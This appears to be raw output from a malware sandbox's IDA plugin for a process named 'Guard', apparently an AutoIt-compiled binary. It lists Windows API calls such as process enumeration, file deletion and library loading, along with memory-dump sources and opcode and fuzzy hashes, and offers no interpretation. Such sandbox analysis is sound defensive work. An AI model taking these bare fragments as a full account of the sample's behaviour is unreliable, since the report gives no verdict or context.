                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                          • String ID: TaskbarCreated
                                                                                          • API String ID: 129472671-2362178303
                                                                                          • Opcode ID: efc606847d00bac60b101fe3b659a91087ed261a50a2d9fed41b604dbfef1cd8
                                                                                          • Instruction ID: dd2db9c26a5b5f785e5f8dbc5cfc8db096c7aa886ec63f4dd5f5c449e1fdcc2f
                                                                                          • Opcode Fuzzy Hash: efc606847d00bac60b101fe3b659a91087ed261a50a2d9fed41b604dbfef1cd8
                                                                                          • Instruction Fuzzy Hash: 33416B31208246ABEB11AFB8ED4DFFF76A5F758300F200225F645951E2DB78BC519761

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 1184 a350db-a3514b CreateWindowExW * 2 ShowWindow * 2
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A35109
                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A3512A
                                                                                          • ShowWindow.USER32(00000000), ref: 00A3513E
                                                                                          • ShowWindow.USER32(00000000), ref: 00A35147
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CreateShow
                                                                                          • String ID: AutoIt v3$edit
                                                                                          • API String ID: 1584632944-3779509399
                                                                                          • Opcode ID: 30ea01e8bcc45400f8d8e89628402ba3941532d68ce6b7a23195930eb390b19b
                                                                                          • Instruction ID: c56dbfea77d030486ea529916caa923529f405989accc052b1bfd77644014546
                                                                                          • Opcode Fuzzy Hash: 30ea01e8bcc45400f8d8e89628402ba3941532d68ce6b7a23195930eb390b19b
                                                                                          • Instruction Fuzzy Hash: FCF0DA715452D47EEA319BA76C8CEAB6E7DE7C6F50F00011EBA00AA1B1C6611892DBB0
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00A8416D
                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00A8417B
                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00A8419B
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00A84245
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 420147892-0
                                                                                          • Opcode ID: dc78f777e189a036c01d28181f881491554b28ed5018c9ed09f53cfa8ca72501
                                                                                          • Instruction ID: 7119c766ad4aaea26b60d5822be1228b68218ed7a8572de93e10344c76d005d6
                                                                                          • Opcode Fuzzy Hash: dc78f777e189a036c01d28181f881491554b28ed5018c9ed09f53cfa8ca72501
                                                                                          • Instruction Fuzzy Hash: F13180711083429FD304EF94D885AAFBBE8BF99350F400A2DF585C61A1EB719A49CB52
                                                                                          APIs
                                                                                            • Part of subcall function 00A349C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A327AF,?,00000001), ref: 00A349F4
                                                                                          • _free.LIBCMT ref: 00A6FB04
                                                                                          • _free.LIBCMT ref: 00A6FB4B
                                                                                            • Part of subcall function 00A329BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A32ADF
                                                                                          Strings
                                                                                          • Bad directive syntax error, xrefs: 00A6FB33
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                          • String ID: Bad directive syntax error
                                                                                          • API String ID: 2861923089-2118420937
                                                                                          • Opcode ID: 9dfeaa746b36ab2b7b2c6a364bff848ebc702f12a2f4e45b762f6a8dc4b52804
                                                                                          • Instruction ID: 2509e99db7fbc0e528ebcdf90772d7eb892184293fa0e400014a09811623383e
                                                                                          • Opcode Fuzzy Hash: 9dfeaa746b36ab2b7b2c6a364bff848ebc702f12a2f4e45b762f6a8dc4b52804
                                                                                          • Instruction Fuzzy Hash: F4919F71914219AFCF04EFA4DD919EEB7B4FF19350F14456AF816AB2A1DB30AE04CB50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b4d6b8b05d1b610b370a52be14f4f0fe476399a7f9d04eb5ced019ef8b34d0df
                                                                                          • Instruction ID: e5340115026d2a001d96f5aa98b54f815797bca356902bfbf878af3d0cc4a1c8
                                                                                          • Opcode Fuzzy Hash: b4d6b8b05d1b610b370a52be14f4f0fe476399a7f9d04eb5ced019ef8b34d0df
                                                                                          • Instruction Fuzzy Hash: 6AF1BB71E04219EBCF14DF98D981AFEB7B5FF48700F50812AF816AB291DB349A51CB91
                                                                                          APIs
                                                                                            • Part of subcall function 00A407BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A407EC
                                                                                            • Part of subcall function 00A407BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A407F4
                                                                                            • Part of subcall function 00A407BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A407FF
                                                                                            • Part of subcall function 00A407BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A4080A
                                                                                            • Part of subcall function 00A407BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A40812
                                                                                            • Part of subcall function 00A407BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4081A
                                                                                            • Part of subcall function 00A3FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A2AC6B), ref: 00A3FFA7
                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A2AD08
                                                                                          • OleInitialize.OLE32(00000000), ref: 00A2AD85
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00A62F56
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1986988660-0
                                                                                          • Opcode ID: 6e076d7dd8480a4399cf936d2f986e0a64081cbb7cd0c466531fa1be6d5f4f40
                                                                                          • Instruction ID: 61345bce980f01fe7da1782a81a0361bd097e68bb483cd38eb5a1974745befed
                                                                                          • Opcode Fuzzy Hash: 6e076d7dd8480a4399cf936d2f986e0a64081cbb7cd0c466531fa1be6d5f4f40
                                                                                          • Instruction Fuzzy Hash: B681AAB09082C18EC395EFA9BDD4A5D7FE9EB89304710856AE419CF2B2EB3044079F61
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove
                                                                                          • String ID: EA06
                                                                                          • API String ID: 4104443479-3962188686
                                                                                          • Opcode ID: 476024823008af9b02941ed1158dd5c5334c7645a31c10873e38be1f7d2ae35f
                                                                                          • Instruction ID: 3d5f179e796176efb8113b56c25b3c078a060f4f149d4899b6d34cd9ff2d5b69
                                                                                          • Opcode Fuzzy Hash: 476024823008af9b02941ed1158dd5c5334c7645a31c10873e38be1f7d2ae35f
                                                                                          • Instruction Fuzzy Hash: 3B419E31E042589BDF219B648D51BBF7FB58B4E310F588075F8C6EB286C624AD8483E2
                                                                                          APIs
                                                                                          • _strcat.LIBCMT ref: 00A9E20C
                                                                                            • Part of subcall function 00A24D37: __itow.LIBCMT ref: 00A24D62
                                                                                            • Part of subcall function 00A24D37: __swprintf.LIBCMT ref: 00A24DAC
                                                                                          • _wcscpy.LIBCMT ref: 00A9E29B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: __itow__swprintf_strcat_wcscpy
                                                                                          • String ID:
                                                                                          • API String ID: 1012013722-0
                                                                                          • Opcode ID: 46d98fdce37f92dd37ed60bb5ff472b5c60bb804f89f29c4a1d40d23c2f7b11a
                                                                                          • Instruction ID: 58b70ed7183a74eaedc2a744942f5acd2f13944cdba9768a499ce1cb10246149
                                                                                          • Opcode Fuzzy Hash: 46d98fdce37f92dd37ed60bb5ff472b5c60bb804f89f29c4a1d40d23c2f7b11a
                                                                                          • Instruction Fuzzy Hash: 0F910835B00514DFCB18DF28D5819AABBF5FF59310B95806AE81A8F366EB30ED51CB81
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00A33E72,?,?,?,00000000), ref: 00A34327
                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00A33E72,?,?,?,00000000), ref: 00A70717
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: e0025e3b8d1f533f15006673b76f6108c39efdb9fc6f6ea39b2847c3344dc601
                                                                                          • Instruction ID: 233f25e9878bf784fad7c05ebadf829fb806a50a50e48d9d7121c17b4c97ac8d
                                                                                          • Opcode Fuzzy Hash: e0025e3b8d1f533f15006673b76f6108c39efdb9fc6f6ea39b2847c3344dc601
                                                                                          • Instruction Fuzzy Hash: F2015270284309BEF3245F68DC8AF667A9CEB05768F10C319FAE56E1E1C6B56C858B14
                                                                                          APIs
                                                                                            • Part of subcall function 00A4593C: __FF_MSGBANNER.LIBCMT ref: 00A45953
                                                                                            • Part of subcall function 00A4593C: __NMSG_WRITE.LIBCMT ref: 00A4595A
                                                                                            • Part of subcall function 00A4593C: RtlAllocateHeap.NTDLL(00BB0000,00000000,00000001,?,00000004,?,?,00A41003,?), ref: 00A4597F
                                                                                          • std::exception::exception.LIBCMT ref: 00A4101C
                                                                                          • __CxxThrowException@8.LIBCMT ref: 00A41031
                                                                                            • Part of subcall function 00A487CB: RaiseException.KERNEL32(?,?,?,00ADCAF8,?,?,?,?,?,00A41036,?,00ADCAF8,?,00000001), ref: 00A48820
                                                                                          Similarity
                                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                          • String ID:
                                                                                          • API String ID: 3902256705-0
                                                                                          • Opcode ID: 146b673abc6c8b7ab2f6019d93b0beb09448691c7f64ca35852339ca4e6ab594
                                                                                          • Instruction ID: 2db65156e9352211f2fbf28c5997a512c024033b1bdef2399e16bd9b43a6fd48
                                                                                          • Opcode Fuzzy Hash: 146b673abc6c8b7ab2f6019d93b0beb09448691c7f64ca35852339ca4e6ab594
                                                                                          • Instruction Fuzzy Hash: 4BF0A43950421DA6CF20BB68ED159DE7BAC9F81350F100866F91496292DFB19B84D2E1
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ac62e04d1df91ecf6990f674cfd25c4f6138154762f070c798a956bb49cb705a
                                                                                          • Instruction ID: 8f006c4fb90155f0c98ca78382db781b961d169626372a3ad96388a14df7c4f3
                                                                                          • Opcode Fuzzy Hash: ac62e04d1df91ecf6990f674cfd25c4f6138154762f070c798a956bb49cb705a
                                                                                          • Instruction Fuzzy Hash: 0461DA70600616DFDB10DF69E981B7AB7F9EF58300F11847AE91A8B281D774ED80CB92
                                                                                          APIs
                                                                                          • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00A341B2
                                                                                          Similarity
                                                                                          • API ID: FilePointer
                                                                                          • String ID:
                                                                                          • API String ID: 973152223-0
                                                                                          • Opcode ID: 6c24001a7b91c4fd766b38e38280f91504c0525bc2c4bcb0694eb44bb59e1890
                                                                                          • Instruction ID: 3b5d824eab0fc3e287bd9cb99a27d5eb2e21d75b9b8611fae6cf0a52ffa2dbac
                                                                                          • Opcode Fuzzy Hash: 6c24001a7b91c4fd766b38e38280f91504c0525bc2c4bcb0694eb44bb59e1890
                                                                                          • Instruction Fuzzy Hash: F6312C71A00A5AAFCB18CF6DC884AADB7B5FF58310F148729F81993714D770BDA08B90
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00A40EE7
                                                                                          Similarity
                                                                                          • API ID: CreateSnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 3332741929-0
                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                          • Instruction ID: 1d6e867d9228f7e491c7d3bb1e887dc42b959f1204739f692b08b4a0050bd0d4
                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                          • Instruction Fuzzy Hash: EA31D379A00109DBC718DF58C481969FBB6FF99300B648AA5E609CB252E731EDD1EBC0
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: ClearVariant
                                                                                          • String ID:
                                                                                          • API String ID: 1473721057-0
                                                                                          • Opcode ID: 6e65c52dea401989ff069f0172d99f6f0921f2a16d3be06fdcebbfe77ebcfd50
                                                                                          • Instruction ID: 030583e5fc1baf8ed13f26958f2860b5d8864c21b6b0e217bfad757f9bf60a99
                                                                                          • Opcode Fuzzy Hash: 6e65c52dea401989ff069f0172d99f6f0921f2a16d3be06fdcebbfe77ebcfd50
                                                                                          • Instruction Fuzzy Hash: 72410974909351DFDB14DF18C584B1ABBE1BF85318F1989ACE8899B362C371EC89CB52
                                                                                          APIs
                                                                                            • Part of subcall function 00A34B29: FreeLibrary.KERNEL32(00000000,?), ref: 00A34B63
                                                                                            • Part of subcall function 00A4547B: __wfsopen.LIBCMT ref: 00A45486
                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A327AF,?,00000001), ref: 00A349F4
                                                                                            • Part of subcall function 00A34ADE: FreeLibrary.KERNEL32(00000000), ref: 00A34B18
                                                                                            • Part of subcall function 00A348B0: _memmove.LIBCMT ref: 00A348FA
                                                                                          Similarity
                                                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                                                          • String ID:
                                                                                          • API String ID: 1396898556-0
                                                                                          • Opcode ID: dd503a2a48b0a40aea386251f2a511d8e4021439612dc86ee88b084811b941e7
                                                                                          • Instruction ID: 022fe1b8bb1d2b8cd64c88aa5c6dffeb8733728841c6790125a45f8312a2a79a
                                                                                          • Opcode Fuzzy Hash: dd503a2a48b0a40aea386251f2a511d8e4021439612dc86ee88b084811b941e7
                                                                                          • Instruction Fuzzy Hash: D2113632A50305ABCF10FF70DE02FAE77A99F48741F10842DF541A6182EF70AE00AB94
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: ClearVariant
                                                                                          • String ID:
                                                                                          • API String ID: 1473721057-0
                                                                                          • Opcode ID: af53384c44f7848e19fdd10c561054e4520d2dae7cda38c533eaf28f4809107e
                                                                                          • Instruction ID: 1e7c52501d3d4ed5230f1344d4b91c36a1fb7c2ea21cf7ac80148791ce27ebd8
                                                                                          • Opcode Fuzzy Hash: af53384c44f7848e19fdd10c561054e4520d2dae7cda38c533eaf28f4809107e
                                                                                          • Instruction Fuzzy Hash: 212110B4909351DFCB14DF18C544B1ABBF1BF84304F058968F88A57362C731E859CB92
                                                                                          APIs
                                                                                          • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00A33CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00A34276
                                                                                          Similarity
                                                                                          • API ID: FileRead
                                                                                          • String ID:
                                                                                          • API String ID: 2738559852-0
                                                                                          • Opcode ID: d2659063cb16fbb6e0d03897aaf12fe674e1b6ea270737e46f8429d329c6b25d
                                                                                          • Instruction ID: 9c11eb71415dd664bf83d2cb0651ccb8b279a7cb88b5f7e3891388be45d0a7e5
                                                                                          • Opcode Fuzzy Hash: d2659063cb16fbb6e0d03897aaf12fe674e1b6ea270737e46f8429d329c6b25d
                                                                                          • Instruction Fuzzy Hash: 3211F831204B019FD720CF95D480BA7B7F5EB98750F14892DF9AA96A50D7B1F8458B60
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: _memmove
                                                                                          • String ID:
                                                                                          • API String ID: 4104443479-0
                                                                                          APIs
                                                                                          • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00A94998
                                                                                          Similarity
                                                                                          • API ID: EnvironmentVariable
                                                                                          • String ID:
                                                                                          • API String ID: 1431749950-0
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: _fseek
                                                                                          • String ID:
                                                                                          • API String ID: 2937370855-0
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(?,?,?,00A327AF,?,00000001), ref: 00A34A63
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID:
                                                                                          • API String ID: 3664257935-0
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: __fread_nolock
                                                                                          • String ID:
                                                                                          • API String ID: 2638373210-0
                                                                                          APIs
                                                                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00A409E4
                                                                                            • Part of subcall function 00A31821: _memmove.LIBCMT ref: 00A3185B
                                                                                          Similarity
                                                                                          • API ID: LongNamePath_memmove
                                                                                          • String ID:
                                                                                          • API String ID: 2514874351-0
                                                                                          APIs
                                                                                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00A84D31
                                                                                            • Part of subcall function 00A31821: _memmove.LIBCMT ref: 00A3185B
                                                                                          Similarity
                                                                                          • API ID: FolderPath_memmove
                                                                                          • String ID:
                                                                                          • API String ID: 3334745507-0
                                                                                          APIs
                                                                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00A706E6,00000000,00000000,00000000), ref: 00A342BF
                                                                                          Similarity
                                                                                          • API ID: FilePointer
                                                                                          • String ID:
                                                                                          • API String ID: 973152223-0
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNEL32(?,00A83BFE), ref: 00A84FED
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          APIs
                                                                                            • Part of subcall function 00A84005: FindFirstFileW.KERNEL32(?,?), ref: 00A8407C
                                                                                            • Part of subcall function 00A84005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00A840CC
                                                                                            • Part of subcall function 00A84005: FindNextFileW.KERNEL32(00000000,00000010), ref: 00A840DD
                                                                                            • Part of subcall function 00A84005: FindClose.KERNEL32(00000000), ref: 00A840F4
                                                                                          • GetLastError.KERNEL32 ref: 00A8C292
                                                                                          Similarity
                                                                                          • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                          • String ID:
                                                                                          • API String ID: 2191629493-0
                                                                                          APIs
                                                                                          • CloseHandle.KERNEL32(?,?,00000000,00A62F8B), ref: 00A342EF
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0